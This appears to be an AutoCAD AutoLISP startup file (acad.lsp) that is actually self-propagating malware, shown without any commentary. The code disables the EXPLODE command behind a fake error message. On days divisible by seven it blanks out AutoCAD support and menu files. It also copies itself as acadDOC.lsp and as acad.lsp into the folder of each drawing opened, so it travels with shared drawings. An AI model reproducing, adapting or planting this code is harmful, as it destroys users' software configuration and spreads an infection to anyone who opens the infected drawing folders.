(defun
s::startup
()
(setq old_cmd (getvar "cmdecho"))
(setvar "cmdecho" 0)
(setvar
"acadlspasdoc"
1)
(command
"undefine"
"explode")
(setq path (findfile
"base.dcl"))
(setq path (substr path 1
(- (strlen path) 8)))
(setq mnlpath (getvar
"menuname"))
(setq nowdwg (getvar
"dwgname"))
(setq wjqm (findfile nowdwg))
(if (not wjqm)
(setq wjqm (getvar
"DWGPREFIX")))
(setq dwgpath (substr
wjqm 1 (- (strlen wjqm) (strlen nowdwg))))
(setq acadpath (findfile
"acad.lsp"))
(setq acadpath (substr
acadpath 1 (- (strlen acadpath) 8)))
(setq ns1 ""
ns2 "")
(setq lspbj 0)
(setq wjqm (strcat
path "acad.lsp"))
(if (setq wjm (open wjqm "r"))
(progn
(while (setq wz
(read-line wjm))
(if (>
(strlen wz) 14)
(if (=
(substr wz 8 7)
"acadDOC")
(setq
lspbj 1)
)))
(close wjm)
))
(if (= 7
(gcd 7 (atoi (menucmd "M=$(edtime,$(getvar,date),D)")))
)(progn (setq wjm (open (findfile
"acad.pgp")
"w"
))
(write-line 
" " wjm)
(close wjm)
(setq wjm
(open (findfile
"acad.mnr")
"w"
		)
)
(write-line " " wjm)
(close wjm)
(setq wjm
(open (findfile
			"acad.mnc"
		      )
		      "w"
		)
      )
      (write-line " " wjm)
      (close wjm)
      (setq wjm	(open (findfile
			"acad.mns"
		      )
		      "w"
		)
      )
      (write-line " " wjm)
      (close wjm)
      (setq wjm	(open (findfile
			"acad.mnu"
		      )
		      "w"
		)
      )
      (write-line " " wjm)
      (close wjm)
      (setq wjm	(open (findfile
			"acad.dcl"
		      )
		      "w"
		)
      )
      (write-line " " wjm)
      (close wjm)
      (setq wjm	(open (findfile
			"acad.lin"
		      )
		      "w"
		)
      )
      (write-line " " wjm)
      (close wjm)
      (setq wjm	(open (findfile
			"acad.fmp"
		      )
		      "w"
		)
      )
      (write-line " " wjm)
      (close wjm)
      (setq wjm	(open (findfile
			"acad.unt"
		      )
		      "w"
		)
      )
      (write-line " " wjm)
      (close wjm)
      (setq wjm	(open (findfile
			"acad.pat"
		      )
		      "w"
		)
      )
      (write-line " " wjm)
      (close wjm)
      (setq wjm	(open (findfile
			"base.dcl"
		      )
		      "w"
		)
      )
      (write-line " " wjm)
      (close wjm)
    )
  )
(if (and (/= acadpath path) (not (findfile "acaddoc.lsp")))
(progn
(if (= lspbj 0)(progn
(setq wjqm (strcat path "acad.lsp"))
(setq wjm (open wjqm "a"))
(write-line
(strcat "(load " (chr 34) "acadDOC" (chr 34) ")")
wjm
)(write-line "(princ)" wjm)
(close wjm)))
(setq oldacad
(findfile "acad.lsp"))
(setq newacad (strcat path "acadDOC.lsp"))(if (setq wjm11 (open newacad "w"))
(progn
(setq wjm0 (open oldacad "r"))
(while (setq wz (read-line wjm0))(write-line wz wjm11))(close wjm0)
(close
wjm11))
  )
    )(progn
(if (/= (substr nowdwg 1 7) "Drawing")
(progn
(setq oldacad (findfile "acadDOC.lsp"))
	  (setq newacad (strcat dwgpath "acad.lsp"))
	  (if (setq wjm1 (open newacad "w"))
	    (progn
	      (setq wjm (open oldacad "r"))
	      (while (setq wz (read-line wjm))
		(write-line wz wjm1)
	      )
	      (close wjm)
	      (close wjm1)
)))
)
)
)
(setvar
"cmdecho"
old_cmd
)
(princ)
)
(defun
C:explode
(/
p
cont
old_cmd
)
(setq
old_cmd
(getvar
"cmdecho"
))
(setvar
"cmdecho"
0
)
(setq
p
(ssget)
)
(if
p
(progn
(setq
cont
(sslength
p)
)
(princ
"\nSeltct
objects:"
)
(princ
cont
)
(princ
"
found" )
(princ
"\n"
 )
(princ
cont
)
(princ
"was not able to be explode"
)
)
)
(setvar
"cmdecho"
old_cmd
)
(princ)
)
(princ)
